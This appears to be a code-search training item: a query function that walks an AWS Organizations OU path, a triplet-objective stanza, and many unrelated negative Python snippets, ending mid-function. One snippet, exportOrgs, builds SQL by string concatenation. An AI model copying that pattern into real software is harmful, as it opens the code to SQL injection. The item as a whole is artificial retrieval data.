def get_ou_from_path(logger, org_client, path): logger.debug("Getting OU from path: %s", path) current_ou = org_client.list_roots()["Roots"][0]["Id"] if path == "/": return {"Id":current_ou, "Path":path} for dir_name in path.split("/")[1:]: logger.debug("Getting OU from path: %s, looking for: %s", path, dir_name) found = False args = dict(ParentId=current_ou) children = utils.generic_paginator(logger, org_client.list_organizational_units_for_parent, "OrganizationalUnits", **args) for org_unit in children: if org_unit["Name"] == dir_name: current_ou = org_unit["Id"] found = True break if not found: raise ValueError("OU path not found") return {"Id":current_ou, "Path":path}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_accounts_for_ou(logger, options, org_client, path):\n logger.debug(\"Getting accounts for OU: %s\", path)\n org_unit = get_ou_from_path(logger, org_client, path)\n ous = []\n if options.no_recursive:\n ous.append(org_unit)\n else:\n ous.extend(get_child_ous(logger, org_client, org_unit))\n\n result = []\n for org_unit in ous:\n args = {\"ParentId\":org_unit[\"Id\"]}\n accounts = utils.generic_paginator(logger, org_client.list_accounts_for_parent,\n \"Accounts\", **args)\n for acc in accounts:\n acc[\"Path\"] = org_unit[\"Path\"]\n if 'Status' in acc:\n if acc['Status'] != 'SUSPENDED':\n result.append(acc)\n else:\n logger.info(\"found suspended account %s, ignoring it.\" % acc)\n return result", "def get_child_ous(logger, org_client, org_unit):\n logger.debug(\"Getting OUs for: %s\", org_unit)\n result = [org_unit]\n\n # for this OU, get all the children...\n args = dict(ParentId=org_unit[\"Id\"])\n children = utils.generic_paginator(logger, org_client.list_organizational_units_for_parent,\n \"OrganizationalUnits\", **args)\n\n # update child paths and then call ourselves recursively to find all children\n for child in children:\n child[\"Path\"] = \"{}/{}\".format(org_unit[\"Path\"], child[\"Name\"]).replace(\"//\", \"/\")\n result.extend(get_child_ous(logger, org_client, child))\n\n return result", "def test_retrieve_l_organizations(self):\n pass", "def users_organizations(user):\n if not user or not user.is_authenticated():\n return None\n else:\n return get_users_organizations(user)", "def parse_common_organization_path(path: str) -> Dict[str, str]:\n m = re.match(r\"^organizations/(?P<organization>.+?)$\", path)\n return m.groupdict() if m else {}", "def parse_common_organization_path(path: str) -> Dict[str, str]:\n m = re.match(r\"^organizations/(?P<organization>.+?)$\", path)\n return m.groupdict() if m else {}", "def organizations(self):\n self.elements('organizations')", "def organizations(self):\n return self.get('{}/orgs'.format(ApiVersion.A1.value))", "def test_retrieve_l_organization(self):\n pass", "def save_organizations(self, user, path=None):\n # Redis has an end_cursor if we've collected this data before\n end_cursor = self.redis.get(''.join(['gh:', user.login, ':organizations:endCursor']))\n if end_cursor:\n end_cursor = end_cursor.decode('utf-8')\n end_cursor = ''.join(['\"', end_cursor, '\"'])\n organizations = u.organizations(first=100, after=end_cursor)\n else:\n organizations = u.organizations(first=100)\n if not organizations:\n return False\n while True:\n if organizations['data']['user']['organizations']['edges']:\n index = ''.join(['gh_organizations-', self.timestamp])\n self._write_to_datastore(index=index,\n doc_type='GithubOrganizations',\n document=organizations,\n login=user.login,\n path=path)\n has_next_page = organizations['data']['user']['organizations']['pageInfo']['hasNextPage']\n end_cursor = organizations['data']['user']['organizations']['pageInfo']['endCursor']\n if has_next_page:\n organizations = u.organizations(first=100, after=end_cursor)\n else:\n # Cache the end_cursor where we last collected data\n self.redis.set(''.join(['gh:', u.login, ':organizations:endCursor']), end_cursor)\n break\n else:\n break\n\n return True", "def list_ou(self, _):\n cn_re = re_compile(\"{[^}]+}\")\n results = self.engine.query(self.engine.GPO_INFO_FILTER(), [\"cn\", \"displayName\"])\n gpos = {}\n for gpo in results:\n gpos[gpo[\"cn\"]] = gpo[\"displayName\"]\n\n results = self.engine.query(self.engine.OU_FILTER())\n for result in results:\n print(result[\"distinguishedName\"])\n if \"gPLink\" in result:\n guids = cn_re.findall(result[\"gPLink\"])\n if len(guids) > 0:\n print(\"[gPLink]\")\n print(\"* {}\".format(\"\\n* \".join([gpos[g] if g in gpos else g for g in guids])))", "def test_organizations_read(self):\n pass", "async def get_organizations(request: Request):\n redis = request.app.state.redis\n organizations_obj = orjson.loads(await redis.get_key(\"influxdb_organizations\"))\n return [org for org in organizations_obj]", "def test_getorgs(self):\n pass", "def traverse(name, furtherPath):", "def resolve_path(self, path):\n if path:\n if path[0] == '/':\n #zope objects case\n try: return self.unrestrictedTraverse(path)\n except: pass\n else:\n #aliss (python) objects case\n try: return self.get_aliss_object(path)\n except: pass\n #case of no path\n pass", "def computeMailboxOu(portal, title):\n\n catalog = portal.portal_catalog\n\n current = cleaned = toAscii(title).lower()\n i = 1\n existing = True\n while existing:\n existing = catalog(ou=current)\n if not existing:\n break\n current = '%s_%d' % (cleaned, i)\n i += 1\n dtool = getToolByName(portal, 'portal_directories', None)\n if dtool is not None: # not in unit tests\n ldir = getattr(dtool, 'local_addressbook_ldap', None)\n if ldir is not None:\n createOuInLDAP(ldir, current)\n return current", "def test_getorganizations_item(self):\n pass", "def calc_path_2_ORCIDs(path=curr,node1=None,node2=None):\n\n with open(path + '/' + 'ORCID_graph.pkl', 'rb') as f:\n G = pickle.load(f)\n\n if (node1 is None) or (node2 is None):\n with open(path + '/' + 'centrality.csv', 'rb') as f:\n centrality = csv.reader(f, delimiter='\\t')\n rn = 0\n for row in centrality:\n if rn == 0:\n tmp1 = row\n rn += 1\n elif rn == 1:\n tmp2 = row\n rn += 1\n else:\n break\n if node1 is None:\n node1 = tmp1[0]\n if node2 is None:\n node2 = tmp2[0]\n\n try:\n short_path = nx.algorithms.shortest_paths.generic.shortest_path(G, source=node1,target=node2)\n except:\n return []\n\n return short_path", "def test_retrieve_l_organization_locations(self):\n pass", "def atlas_organizations():\n pass", "def sub_test_verify_organizations_paths(self):\n self.TR.has_active_organizations() # resets the active orgs\n original_active_count = len(self.TR.active_organizations)\n last_org = self.TR.active_organizations[0]\n last_org_upload_paths = last_org.org_machine_upload_paths()\n random_index = random.randrange(0, len(last_org_upload_paths))\n remove_file_or_dir(last_org_upload_paths[random_index])\n self.TR.verify_organizations_paths()\n self.assertNotEqual(original_active_count, len(self.TR.active_organizations))", "def test_organizations_list(self):\n pass", "def traverse(self, path):\n\n path_list = [s for s in path.split('/') if len(s) > 0 ]\n # print(path)\n # print('files:', self.files)\n directory = self.files\n index = 0\n while index < len(path_list) and path_list[index] in directory:\n if type(directory[path_list[index]]) is str: # directory is a file\n break\n directory = directory[path_list[index]]\n index += 1\n print('info', directory, path_list[index:])\n return directory, path_list[index:]", "def get_iso_path(src_iso_path, iso, dvd_path_list):\n for path in dvd_path_list: \n for root, _, all_files in os.walk(path.strip()):\n for onefile in all_files: \n if iso.upper() == onefile.upper(): \n src_iso_path = os.path.join(root, onefile) \n initlog(\"find iso: %s\" % src_iso_path)\n break\n return src_iso_path", "def test_get_organization(self):\n pass", "def _get_ou_ids(self, org):\n\n # get root id\n root_id = self._get_root_id(org)\n\n # get OUs under the Org root\n ou_list_at_root_level = self._list_ou_for_parent(org, root_id)\n\n _ou_name_to_id_map = {}\n _all_ou_ids = []\n\n for ou_at_root_level in ou_list_at_root_level:\n # build list of all the OU IDs under Org root\n _all_ou_ids.append(ou_at_root_level.get('Id'))\n # build a list of ou id\n _ou_name_to_id_map.update(\n {ou_at_root_level.get('Name'): ou_at_root_level.get('Id')}\n )\n\n self.logger.info(\"Print OU Name to OU ID Map\")\n self.logger.info(_ou_name_to_id_map)\n\n return _all_ou_ids, _ou_name_to_id_map", "def _get_path_objs(self, path_list):\n objs = []\n for path in path_list:\n obj = self.unrestrictedTraverse(path, None)\n if obj and getattr(obj, 'isPrincipiaFolderish', 0):\n objs.append(obj)\n \n return objs", "def createOuInLDAP(ldir, ou):\n\n dn = 'ou=%s,%s' % (ou, ldir.ldap_base_creation)\n attrs = {'objectClass': ['top', 'organizationalUnit'],\n 'ou': ou}\n ldir.insertLDAP(dn, attrs)", "def extract_organization(self, root):\n organization = {}\n info = root.xpath('.//li/h4/a')\n if info:\n link = info[0].get('href', None)\n name = info[0].get('title', None)\n if link and name:\n stmt = select([\n func.count(self.organization_table.c.path)\n ]).where(\n self.organization_table.c.path == link\n )\n results = self.connection.execute(stmt).fetchall()\n if results[0][0] > 0:\n self.logger.debug('{} already exists'.format(name))\n return None\n self.logger.debug('Querying {1}: {0}'.format(link, name))\n response = self.session.get(self.PODEROPEDIA_BASE_URL + link)\n content = response.content\n html_tree = etree.HTML(content, parser=self.parser)\n connections = html_tree.xpath('//div[@id=\"conexiones\"]')\n if connections:\n organization_data = self.extract_element_data(connections[0])\n organization['organization_data'] = organization_data if organization_data else {}\n organization['organization_data']['path'] = link\n\n person = self.extract_persons(connections[0])\n organization['member'] = person if person else []\n for item in organization['member']:\n item.update({'source_path': link})\n\n related_organization = self.extract_participation(connections[0])\n organization['organization'] = related_organization if related_organization else []\n for item in organization['organization']:\n item.update({'source_path': link})\n return organization", "def traverse(tree, path):\n for node in path:\n tree = tree[node]\n return tree", "def list_all_organizations(ctx):\n pprint(ctx.obj.orgs.get().data)", "def organizations(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"organizations\")", "def onto2path(ontology_name_or_path: str) -> str:\n prefix = \"./resources/ontologies/\"\n predefined_map = {\n \"swo\": f\"{prefix}/swo_merged.owl\",\n \"awo\": f\"{prefix}/AfricanWildlifeOntology1.owl\",\n \"ontodt\": f\"{prefix}/OntoDT.owl\",\n \"stuff\": f\"{prefix}/stuff.owl\",\n \"demcare\": f\"{prefix}/exchangemodel.owl\",\n \"trh\": f\"{prefix}/trh.owl\",\n \"pizza\": f\"{prefix}/pizza.owl\"\n }\n if ontology_name_or_path in predefined_map:\n return predefined_map[ontology_name_or_path]\n else:\n return ontology_name_or_path", "def exportOrgs ( c ) :\n assert str(type(c)) == \"<type '_mysql.connection'>\"\n xml = \"\"\n o = sqlQuery ( c, \"select * from Organizations;\" )\n for i in o:\n oL = sqlQuery ( c, \"select * from OrganizationLocations where orgID = '\"+i[0]+\"';\" )\n oER = sqlQuery ( c, \"select * from OrganizationExternalResources where orgID = '\"+i[0]+\"';\" )\n oTC = sqlQuery ( c, \"select * from OrganizationsToCrises where orgID = '\"+i[0]+\"';\" )\n pTO = sqlQuery ( c, \"select * from PeopleToOrganizations where orgID = '\"+i[0]+\"';\" )\n xml += openTagAtt ( \"Organization\", \"organizationIdent\", i[0])\n xml += openCloseTag ( \"Name\", i[1])\n xml += closeTagAtt ( \"Kind\", \"organizationKindIdent\", i[2])\n for j in oL :\n xml += openTag ( \"Location\" )\n xml += openCloseTag ( \"Locality\", j [ 1 ] )\n xml += openCloseTag ( \"Region\", j [ 2 ] )\n xml += openCloseTag ( \"Country\", j [ 3 ] )\n xml += closeTag ( \"Location\" )\n xml += openCloseTag (\"History\", i[3])\n xml += openTag ( \"ContactInfo\" )\n xml += openCloseTag (\"Telephone\", i[4])\n xml += openCloseTag (\"Fax\", i[5])\n xml += openCloseTag (\"Email\", i[6])\n xml += openTag (\"PostalAddress\")\n xml += openCloseTag (\"StreetAddress\", i[7])\n xml += openCloseTag ( \"Locality\", i[8])\n xml += openCloseTag ( \"Region\", i[9])\n xml += openCloseTag ( \"PostalCode\", i[10])\n xml += openCloseTag ( \"Country\", i[11])\n xml += closeTag ( \"PostalAddress\" )\n xml += closeTag ( \"ContactInfo\" )\n xml += openTag (\"ExternalResources\")\n for j in oER:\n xml += openCloseTag ( j[1], j[2])\n xml += closeTag (\"ExternalResources\")\n xml += openTag (\"RelatedCrises\")\n for j in oTC:\n xml += closeTagAtt (\"RelatedCrisis\", \"crisisIdent\", j[1])\n xml += closeTag (\"RelatedCrises\")\n xml += openTag (\"RelatedPersons\")\n for j in pTO:\n xml += closeTagAtt (\"RelatedPerson\", \"personIdent\", j[0])\n xml += closeTag (\"RelatedPersons\")\n xml += closeTag (\"Organization\")\n assert str ( type ( xml ) ) == \"<type 'str'>\"\n return xml", "def vpath(self, ospath):\n for root, path in self._top_paths.items():\n if ospath.startswith(path + '/'):\n return '/%s%s' % (root, ospath[len(path):])", "def organizations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"organizations\")", "def organizations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"organizations\")", "def listOrganizations(self, name='', type=''):\n return self.get_json('/organization', {'name': name, 'type': type})", "def traverse(self, path):\n path_list = [s for s in path.split('/') if len(s) > 0 ]\n directory = self.files\n index = 0\n while index < len(path_list) and path_list[index] in directory:\n if type(directory[path_list[index]]) is str: # directory is a file\n break\n directory = directory[path_list[index]]\n index += 1\n return directory, path_list[index:]", "def _createOrganizationsCollections(folder):\n collections = [\n {'id': 'all_orgs', 'tit': _('all_orgs'), 'subj': (u'search', ), 'query': [\n {'i': 'portal_type',\n 'o': 'plone.app.querystring.operation.selection.is',\n 'v': ['organization']}],\n 'cond': u\"\", 'bypass': [],\n 'flds': (u'select_row', u'org_pretty_link_with_additional_infos',\n u'SelectedInPlonegroupColumn', u'PloneGroupUsersGroupsColumn',\n u'review_state', u'CreationDate', u'actions'),\n 'sort': u'sortable_title', 'rev': False, 'count': False},\n ]\n _createDashboardCollections(folder, collections)", "def _resolve_path(d, path):\n accum_value = d\n for node_key in path:\n accum_value = accum_value[node_key]\n return accum_value", "def common_organization_path(organization: str,) -> str:\n return \"organizations/{organization}\".format(organization=organization,)", "def organizations_at_location(self, location):\n if location is None:\n queryset = self.filter(location=None)\n elif location.region is None:\n queryset = self.filter(Q(location=None) | Q(location=location))\n elif location.tik is None:\n queryset = self.filter(Q(location=None) | Q(location__id__in=[location.region_id, location.id]))\n else:\n queryset = self.filter(Q(location=None) | Q(location__id__in=[location.tik_id, location.region_id, location.id]))\n\n organization_ids = set(queryset.values_list('organization_id', flat=True))\n\n organizations = Organization.objects.filter(id__in=organization_ids).order_by('title')\n\n for representative in OrganizationRepresentative.objects.filter(organization__in=organization_ids):\n organization = (filter(lambda org: org.id==representative.organization_id, organizations) or [None])[0]\n if organization:\n organization.representative = True\n\n return organizations", "def myorgs(request):\n context = RequestContext(request)\n \n user = request.user\n orgs = user.orgusers.get_query_set()\n \n context['orgs'] = orgs\n return render_to_response('myorgs.html', context)", "def education(osm_path): \n return (retrieve(osm_path,'multipolygons',['amenity'],**{'amenity':[\"='college' or \",\"='kindergarten' or \",\"='library' or \",\"='school' or \",\"='university'\"]})).rename(columns={'amenity': 'asset'})", "def acyclic_sub_path(tree, path):\n for u, v in pairwise(reversed(path)):\n if v in tree.nodes and u not in tree.nodes:\n return path[path.index(v):]", "def get_orgs():\n \n url = \"https://api.github.com/user/orgs\"\n \n org_urls = []\n orgs = utils.get_json(url)\n \n for org in orgs:\n org_urls.append(org[\"url\"])\n \n return org_urls", "def get_organizations(self, language=None):\n return self.get_direct_related_page_extensions(\n Organization, OrganizationPluginModel, language=language\n )", "def obtener_por_uo(unidad_organica_id):\n db = current.db\n q = (db.departamento.id > 0)\n q &= (db.departamento.unidad_organica_id == unidad_organica_id)\n return db(q).select(db.departamento.ALL,\n orderby=db.departamento.nombre)", "def process_organizations(self, organizations):\n self.process_elements(\n organizations,\n self.organization_table,\n self.extract_organization,\n ['organization_data', 'member', 'organization']\n )", "def oedir(self):\n # if we've never read, (check out), the working dir, or if the\n # last time we did doesn't match what's available in the\n # repository...\n upstreamrev = self.svnrev(self.options.svnloc)\n if (not hasattr(self, '_last_read_oedir')\n or (self._last_read_oedir != upstreamrev)):\n\n self._oedir = self.options.oedir\n self.logger.debug('(Re)reading oedir: {}'.format(upstreamrev))\n\n if os.path.isdir(self._oedir):\n self.logger.debug('+ svn cleanup {}'.format(self._oedir))\n self.svn().connection.cleanup(self._oedir)\n\n self.logger.debug('+ svn co {} {}'.format(self.options.svnloc, self._oedir))\n self.svn().co(self.options.svnloc, self._oedir)\n downstreamrev = self.svnrev(self._oedir)\n self.logger.debug('Read oedir: {}'.format(downstreamrev))\n self._last_read_oedir = downstreamrev\n\n return self._oedir", "def get_organizations(\n self, *, params: Optional[dict] = None\n ) -> \"resource_types.Organizations\":\n\n return communicator.Organizations(self.__requester).fetch(parameters=params)", "def generate_test_organizations(self):\n def generate_organizations_for_parent(org_names, parent_name=None):\n item_dict = {}\n for name in org_names:\n if parent_name:\n item_dict['{}_{}'.format(name, parent_name)] = {\n 'name': name,\n 'parent': parent_name\n }\n else:\n item_dict['{}'.format(name)] = {\n 'name': name\n }\n return item_dict\n\n self.os_dict = \\\n generate_organizations_for_parent(\n ['o1', 'o1', 'o2', 'o3', 'o4_del', 'o5_del'])\n\n # generate organizations in database\n self.orgs = self.create_orgs_from_data(self.os_dict)\n\n # generate sub organizations\n self.subs_o1_dict = \\\n generate_organizations_for_parent(\n ['sub1', 'sub2', 'sub3_del', 'sub4_del', 'sub5_del'], 'o1')\n\n self.subs_o2_dict = \\\n generate_organizations_for_parent(\n ['sub1', 'sub2', 'sub3', 'sub4_del', 'sub5_del'], 'o2')\n\n self.subs_o3_dict = \\\n generate_organizations_for_parent(\n ['sub1', 'sub2', 'sub3_del'], 'o3')\n\n # generate sub organizations dictionary\n self.subs_dict = {\n **self.subs_o1_dict,\n **self.subs_o2_dict,\n **self.subs_o3_dict,\n }\n\n # update organizations list with sub_organizations in database\n self.orgs.update(\n self.create_orgs_from_data(self.subs_dict, self.orgs))", "def traverse_file(path: str) -> List[LogItem]:\n org_file = OrgDataStructure()\n org_file.load_from_file(path)\n return traverse_node(org_file.root, [], path)", "def get_organization_links_by_page(self):\n return self.get_resource_by_page(\"/orgs\")", "def common_organization_path(\n organization: str,\n ) -> str:\n return \"organizations/{organization}\".format(\n organization=organization,\n )", "def canonicalPath(path_or_object):", "def search_dir(cautare, adresa):\n if os.path.isdir(adresa):\n for director in os.listdir(adresa):\n path = os.path.join(adresa, director)\n if os.path.isfile(path) and (cautare in director):\n print(\"Fisierul care contine litera %s se gaseste \"\n \"la adresa %s\" % (cautare, path))\n else:\n search_dir(cautare, path)", "def GcsPath(*path_components):\n return os.path.join(*path_components)", "def get_domain_otu(self):\n for leaf in self.feature_tree.get_terminals():\n leaf.domain_otu = leaf.name\n self.feature_tree = self.get_node_domain_otu(self.feature_tree)\n #print(temp)\n\n \"\"\"\n for clade in self.feature_tree.find_clades(order='level'):\n if not clade.clades:\n continue\n if clade.clades[0].abu < clade.clades[1].abu:\n clade.domain_otu = clade.clades[1].name\n else:\n clade.domain_otu = clade.clades[0].name\n print('self feature tree root abu')\n print(self.feature_tree.domain_otu)\n \"\"\"", "def ospath(self, vPath):\n if not vPath.startswith('/'):\n raise OSError(vPath)\n parts = vPath.split('/')\n toppath = self._top_paths[parts[1]]\n return os.path.join(toppath, *parts[2:])", "def test_import_organization(self):\r\n tree = self.org_tree\r\n root = tree.getroot()\r\n assert importer.put_objects(root) == True", "def get_organization_links(self):\n yield from self.get_resource_by_item(\"/orgs\")", "def walk_up ( dirpath, topdown=False, max_iter=None ):\n def iter_partial_paths ( _join_path=os.sep.join ):\n fspath = os.path.normpath ( dirpath ).rstrip ( os.sep )\n path_elements = fspath.split ( os.sep )\n\n if path_elements:\n p_start = 0 if path_elements[0] else 1\n high = len ( path_elements )\n\n if topdown:\n if not path_elements[0]:\n yield os.sep\n\n for k in range ( p_start+1, high+1 ):\n yield _join_path ( path_elements[:k] )\n else:\n for k in range ( high, p_start, -1 ):\n yield _join_path ( path_elements[:k] )\n\n if not path_elements[0]:\n yield os.sep\n # --- end of iter_partial_paths (...) ---\n\n if max_iter is None:\n for path in iter_partial_paths():\n yield path\n else:\n for n, path in enumerate ( iter_partial_paths() ):\n if n < max_iter:\n yield path\n else:\n return", "def list_orgs(self):\n orgs = list(self.orgs.keys())\n orgs.sort()\n return orgs", "def ListOrganizations(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def build_path(start, end):\n a = hierarchy.index(start)\n b = hierarchy.index(end)\n if a == b:\n return []\n elif a < b:\n return hierarchy[a + 1 : b + 1]\n return list(reversed(hierarchy[b:a]))", "async def All_orgs():\n\n links_13 = []\n links_14 = []\n valid_url = \"/?archive/?gsoc/\\d+[0-9]/orgs/[a-zA-Z]+\"\n for year in range(2009, 2016):\n year_url = melange + \"/archive/gsoc/{}\".format(year)\n soup = await get_page(year_url)\n\n for url in soup.find_all('a'):\n if re.match(valid_url, url.get(\"href\")):\n if year <= 2013:\n links_13.append(join(melange, url.get(\"href\")[1:]))\n else:\n links_14.append(join(melange, url.get(\"href\")[1:]))\n return links_13, links_14", "def TraversalScriptPath(apath,dict_info,user_ini):\n path = apath.replace('\\\\','/')\n# recordLogsToList(r'Transforming path----%s'%path)\n if not os.path.exists(path):\n recordLogsToList('%s is not exist!' % path)\n return False\n if os.path.isfile(path):\n if '.html' in path:\n parseTestcase(path,dict_info,user_ini)\n elif os.path.isdir(path):\n if '.svn' in path:\n pass\n else:\n searchfile = os.listdir(path)\n for vpath in searchfile:\n childpath = path + '/' + vpath\n TraversalScriptPath(childpath,dict_info,user_ini)\n else:\n recordLogsToList('%s is an unknown object,I can not handle it!' % path)\n\n return True", "def nav_path(request):\n\n if not request.repos:\n return []\n\n is_dir = request.pathtype == vclib.DIR\n\n # add root item\n items = []\n root_item = _item(name=request.server.escape(request.repos.name), href=None)\n if request.path_parts or request.view_func is not view_directory:\n root_item.href = request.get_url(\n view_func=view_directory, where=\"\", pathtype=vclib.DIR, params={}, escape=1\n )\n items.append(root_item)\n\n # add path part items\n path_parts = []\n for part in request.path_parts:\n path_parts.append(part)\n is_last = len(path_parts) == len(request.path_parts)\n\n item = _item(name=request.server.escape(part), href=None)\n\n if not is_last or (is_dir and request.view_func is not view_directory):\n item.href = request.get_url(\n view_func=view_directory,\n where=_path_join(path_parts),\n pathtype=vclib.DIR,\n params={},\n escape=1,\n )\n elif not is_dir and request.view_func is not view_log:\n item.href = request.get_url(\n view_func=view_log,\n where=_path_join(path_parts),\n pathtype=vclib.FILE,\n params={},\n escape=1,\n )\n items.append(item)\n\n return items", "def generate_path(self):\n ontology = []\n for item in self.parent.get_ancestors():\n if item.level != 0:\n ontology.append(item.slug)\n\n if self.parent.level != 0:\n ontology.append(self.parent.slug)\n\n ontology.append(self.slug)\n\n return '/' + '/'.join(ontology) + '/'", "def create_ou(self, dn, name, description):\n attrs = {'objectclass': ['top', 'organizationalUnit'], 'ou': name, 'description': description}\n self.add_entry(dn, attrs)", "async def browse_path(svc: Pytheos, path: str) -> TreeEntry:\n tree = await _init_tree_with_sources(svc)\n\n source_id = None\n current_node = tree\n for comp in path.split('/'):\n # Handle leading, trailing, or duplicate slashes\n if comp == '':\n continue\n\n # Refresh our current node and bail out if it can't be found.\n current_node = current_node.get(comp)\n if current_node is None:\n raise ValueError('Could not find path')\n\n # Retrieve the contents of our new current node\n source_id, results = await _retrieve_contents(svc, source_id, current_node.object)\n for item in results:\n current_node[item.name] = TreeEntry(obj=item)\n\n return current_node", "def getImmediateSubdirectories(dir):", "def opath ( dir_name, file_name = None ):\n if file_name:\n return os.path.join(output_path, dir_name, file_name)\n return os.path.join(output_path, dir_name)", "def orcid_lookup(self):\n if not hasattr(self, \"_orcid_lookup\"):\n self._orcid_lookup = {}\n self.load_data()\n for entry in self.data.get(\"contributor\", []):\n if \"@id\" in entry:\n # Orcid represented as full URL but we just want id\n orcid = entry[\"@id\"].split(\"/\")[-1]\n self._orcid_lookup[orcid] = entry\n return self._orcid_lookup", "def test_get_namespaces_from_account(self):\n pass", "def get_organization(self):\n return self.reference[REF_ORGANIZATION][REF_VALUE]", "def get_organization_details(self):\n\n # Returns 1) OU Name to OU ID mapping (dict)\n # key: OU Name (in the manifest); value: OU ID (at root level)\n # 2) all OU IDs under root (dict)\n org = Organizations(self.logger)\n all_ou_ids, ou_name_to_id_map = self._get_ou_ids(org)\n\n # Returns 1) active accounts (list) under an OU.\n # use case: used to validate accounts in the manifest file\n # 2) Accounts for each OU at the root level.\n # use case: map OU Name to account IDs\n # key: OU ID (str); value: Active accounts (list)\n accounts_in_all_ous, ou_id_to_account_map = \\\n self._get_accounts_in_ou(org, all_ou_ids)\n\n # Returns account name in manifest to account id mapping.\n # key: account name; value: account id\n name_to_account_map = self.get_account_for_name(org)\n\n return accounts_in_all_ous, ou_id_to_account_map, \\\n ou_name_to_id_map, name_to_account_map", "def operator_at_traversal_path(path, op):\n fmt_strs = [path[0]] + ['%s' for leaf in path[1:]]\n traversal = '->'.join(fmt_strs[:-1]) + '{op}%s'.format(op=op)\n return traversal", "def get_organization(login: str, url: str, session):\n _try = 0\n tries = 3\n exception = None\n while _try <= tries:\n try:\n organization = session.query(Organization).get(login)\n if not organization:\n organization = Organization(login, url)\n session.add(organization)\n session.commit()\n return organization\n except IntegrityError as e:\n print(f'Got an Organization IntegrityError, Try {_try} of {tries}')\n _try += 1\n exception = e\n pass\n\n raise exception", "def orfFinder(data):\n\t\n\tORFile = getORFs(data.seqFile, \n\t\t\t\t\t data.queryName, \n\t\t\t\t\t data.o)\n\tsetattr(data, \"ORFs\", ORFile)", "def ospathdirname(lp, platform=None):\n if platform is None:\n return os.path.dirname(lp)\n elif platform.startswith(\"win\"):\n return \"\\\\\".join(lp.replace(\"/\", \"\\\\\").split(\"\\\\\")[:-1])\n return \"/\".join(lp.replace(\"\\\\\", \"/\").split(\"/\")[:-1])", "def convert_paths(self):\n # convert to node sequences, dropping s'\n self.nodeseq_paths = []\n for path in self.paths:\n node_seq = [] # don't include s'\n for arc in path:\n node_seq.append(self.arc_info[arc]['destin'])\n self.nodeseq_paths.append(node_seq)\n # convert to og graph\n self.converted_paths = []\n for path in self.nodeseq_paths:\n this_path = []\n add_next_node = True\n for i in range(len(path) - 1):\n print(\"This path is\", this_path)\n node1 = path[i]\n node2 = path[i + 1]\n print(\"node1={}, node2={}\".format(node1, node2))\n if (node1, node2) in self.mapping:\n sc = self.mapping[(node1, node2)]\n print(\"uses sc edge for {}\".format(sc))\n print(\"should add {}, but also need to check for overlaps\".\n format(sc[1:-1]))\n if sc[1] in this_path:\n # we have an overlap\n start = len(this_path) - this_path.index(sc[1])\n this_path.extend(sc[start:-1])\n else:\n this_path.extend(sc[1:-1])\n add_next_node = False # next node is second of sc edge\n elif add_next_node:\n this_path.append(node1)\n else:\n add_next_node = True\n this_path.append(path[-1])\n self.converted_paths.append(this_path)", "def check_and_replace_root_ou_assigned(metaobj):\n if isinstance(metaobj, list):\n root_uid = \"\"\n placeholder = '<OU_ROOT_UID>'\n for obj in metaobj:\n root_uid_replaced = False\n if 'organisationUnits' in obj and len(obj['organisationUnits']) == 1 and \\\n 'userOrganisationUnit' in obj and obj['userOrganisationUnit'] == False and \\\n 'userOrganisationUnitChildren' in obj and obj['userOrganisationUnitChildren'] == False and \\\n 'userOrganisationUnitGrandChildren' in obj and obj['userOrganisationUnitGrandChildren'] == False:\n if root_uid == \"\":\n # Get the root UID\n root_ou = get_metadata_element('organisationUnits', 'level:eq:1')\n if len(root_ou) > 1:\n logger.warning('More than one OU root found in OU Tree')\n root_uid = root_ou[0]['id']\n if obj['organisationUnits'][0]['id'] == root_uid:\n # Remove and use a placeholder\n obj['organisationUnits'][0] = {'id': placeholder}\n root_uid_replaced = True\n elif len(obj['organisationUnits']) > 1:\n # In this case we have a list of organisation units. Remove them and raise a warning\n obj['organisationUnits'] = []\n logger.warning(\n \"The dashboard item with UID \" + obj['id'] + \" has organisation units assigned... Removing\")\n # Remove and use a placeholder also for parentGraphMap\n if 'parentGraphMap' in obj and obj['parentGraphMap'] and root_uid in obj['parentGraphMap']:\n obj['parentGraphMap'][placeholder] = obj['parentGraphMap'][root_uid]\n del obj['parentGraphMap'][root_uid]\n root_uid_replaced = True\n\n if root_uid_replaced:\n # Warn the user\n logger.warning('Element ' + obj['id'] + ' has root OU assigned to it ('\n + root_uid + ')... Replacing with placeholder: ' + placeholder)\n\n return metaobj", "def get_organization_unit(self):\n return self.reference[REF_ORGANIZATION_UNIT][REF_VALUE]", "def social_amenity(osm_path): \n return (retrieve(osm_path,'multipolygons',['amenity'],**{'amenity':[\"='hospital' or \",\"='doctors' or \",\"='clinic' or \",\"='dentist' or \",\"='pharmacy'\"]})).rename(columns={'amenity': 'asset'})", "def _orgsWithLogoForQuery(query, batch_size=5):\n orgs = []\n for org in query:\n if org.logo_url:\n orgs.append(org)\n if len(orgs) == batch_size:\n break\n\n return orgs", "def dir_by_levels(path, levels):\n return op.abspath(op.join(path, *(['..'] * levels)))", "def get_ontology_contributors(repo_path):\n url = 'https://api.github.com/repos/{}/contributors'.format(repo_path)\n # TODO: allow use of oath token;\n # GH has a quota for non-logged in API calls\n time.sleep(3)\n with closing(requests.get(url, stream=False)) as resp:\n ok = resp.status_code == 200\n if ok:\n results = resp.json()\n logging.info(\"RESP={}\".format(results))\n return results\n else:\n logging.error(\"Failed: {}\".format(url))\n return []", "def get_path_ancestry(path: Path) -> Iterable[Path]:\n reverse_parents = reversed(path.parents)\n if path.is_dir():\n return chain(reverse_parents, [path])\n return reverse_parents", "def get_isobath(llcrnrlon=None, urcrnrlon=None, llcrnrlat=None,\n urcrnrlat=None, iso=-200., tfile='dap'):\n plt.ioff()\n lon, lat, topo = etopo_subset(llcrnrlon=llcrnrlon, urcrnrlon=urcrnrlon,\n llcrnrlat=llcrnrlat, urcrnrlat=urcrnrlat,\n tfile=tfile)\n\n fig, ax = plt.subplots()\n cs = ax.contour(lon, lat, topo, [iso])\n path = cs.collections[0].get_paths()[0]\n del(fig, ax, cs)\n plt.ion()\n return path.vertices[:, 0], path.vertices[:, 1]", "def get_path(input_dictionary, output_dictionary,\n input_species_list, output_species_list):\n\n input_operon_list = []\n path_queue = [(input_operon_list, input_species_list) ]\n\n final_operon_path_list = []\n 